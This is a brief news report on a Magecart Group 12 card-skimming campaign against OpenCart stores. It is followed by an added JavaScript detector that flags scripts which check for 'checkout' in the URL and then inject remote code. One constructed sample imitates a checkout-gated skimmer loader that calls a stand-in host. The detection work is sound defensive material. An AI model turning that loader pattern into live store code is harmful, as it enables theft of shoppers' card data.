Researcher Yonathan Klijnsma, of the cybersecurity firm RiskIQ, has discovered a large-scale operation perpetrated by Magecart Group 12 against OpenCart's online store management system.
The modus operandi consisted of first running a script that looked for the word "checkout" in the URL the user visited, to verify that a purchase was being finalized. It then injected the skimmer code and, in this way, obtained the credit card details.
Klijnsma points out that the main cause of these attacks is that developers often prioritize the functionality of web platforms. The intrusion, according to Group-IB, is carried out by one of three methods: exploiting unchecked vulnerabilities, obtaining the administration panel credentials through phishing or brute-force attacks, or compromising an external resource that is loaded into the online store.
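
The two behaviours described above, a script that checks the URL for "checkout" and then pulls further code into the page, can be looked for together when reviewing the JavaScript a store serves, including scripts loaded from external resources. The following is an added example, not code from RiskIQ, Group-IB or the original article; the function names, patterns and sample snippets are assumptions constructed for illustration.

```javascript
// Added example: all names and sample snippets are constructed for illustration.

// Collapse 'check' + 'out' style literal concatenation so that simple
// splitting of the keyword does not hide it from the checks below.
function joinStringLiterals(src) {
  const concat = /(['"])([^'"\\\n]*)\1\s*\+\s*(['"])([^'"\\\n]*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(concat, (m, q1, a, q2, b) => "'" + a + b + "'");
  } while (src !== prev);
  return src;
}

// A URL read and the keyword "checkout" within one statement, in either order.
const URL_GATE = [
  /\b(?:location|document\.URL)\b[^;{}]{0,160}checkout/i,
  /checkout[^;{}]{0,160}\b(?:location|document\.URL)\b/i,
];
// Ways a script can pull further code into the page at run time.
const INJECTION = [
  /createElement\s*\(\s*['"]script['"]\s*\)/i,
  /document\.write(?:ln)?\s*\([^)]*<script/i,
];
const REMOTE_SRC = /\.src\s*=\s*['"](?:https?:)?\/\/([^'"\/]+)/i;

// Flag a script only when both behaviours appear together.
function reviewScript(name, source) {
  const src = joinStringLiterals(source);
  const gate = URL_GATE.some((re) => re.test(src));
  const inject = INJECTION.some((re) => re.test(src));
  const host = (src.match(REMOTE_SRC) || [])[1] || null;
  return { name, gate, inject, remoteHost: host, flagged: gate && inject };
}

// Constructed samples: two ordinary scripts and one checkout-gated loader.
const SAMPLES = {
  'analytics.js': "var s = document.createElement('script'); s.src = 'https://stats.example.invalid/a.js'; document.head.appendChild(s);",
  'checkout-ui.js': "if (location.pathname.indexOf('checkout') !== -1) { document.getElementById('step').className = 'active'; }",
  'loader.js': "if (window.location.href.indexOf('check' + 'out') > -1) { var e = document.createElement('script'); e.src = '//cdn.example.invalid/lib.js'; document.head.appendChild(e); }",
};

for (const [name, source] of Object.entries(SAMPLES)) {
  console.log(reviewScript(name, source));
}
```

A flagged script is a prompt for manual review rather than a verdict, since legitimate code can also load scripts conditionally.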